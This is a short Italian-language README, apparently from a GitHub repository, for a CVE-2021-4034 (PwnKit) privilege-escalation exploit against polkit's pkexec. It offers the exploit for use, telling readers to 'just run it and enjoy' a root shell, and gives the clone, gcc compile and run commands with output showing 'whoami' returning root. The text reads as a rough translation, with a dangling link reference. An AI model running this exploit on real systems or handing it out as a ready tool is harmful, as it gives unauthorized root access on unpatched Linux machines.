
Exploit per CVE-2021-4034 (PwnKit) che eleva i privilegi a root tramite pkexec, fornendo una semplice esecuzione di shell.
Un giorno per l'exploit di escalation dei privilegi di polkit
Basta eseguire e godersi ./blasty dalla propria shell di root.
L'avviso originale dei veri autori è -> qui
Se l'exploit funziona, otterrete immediatamente una shell di root:
(user@tecnokarita)-[~/Descargas] $> git clone https://github.com/T3cnokarita/CVE-2021-4034.git
(user@tecnokarita)-[~/Descargas/CVE-2021-4034] $> gcc -o blasty blasty-vs-pkexec.c
(user@tecnokarita)-[~/Descargas/CVE-2021-4034] $> ./blasty
# whoami
root
# exit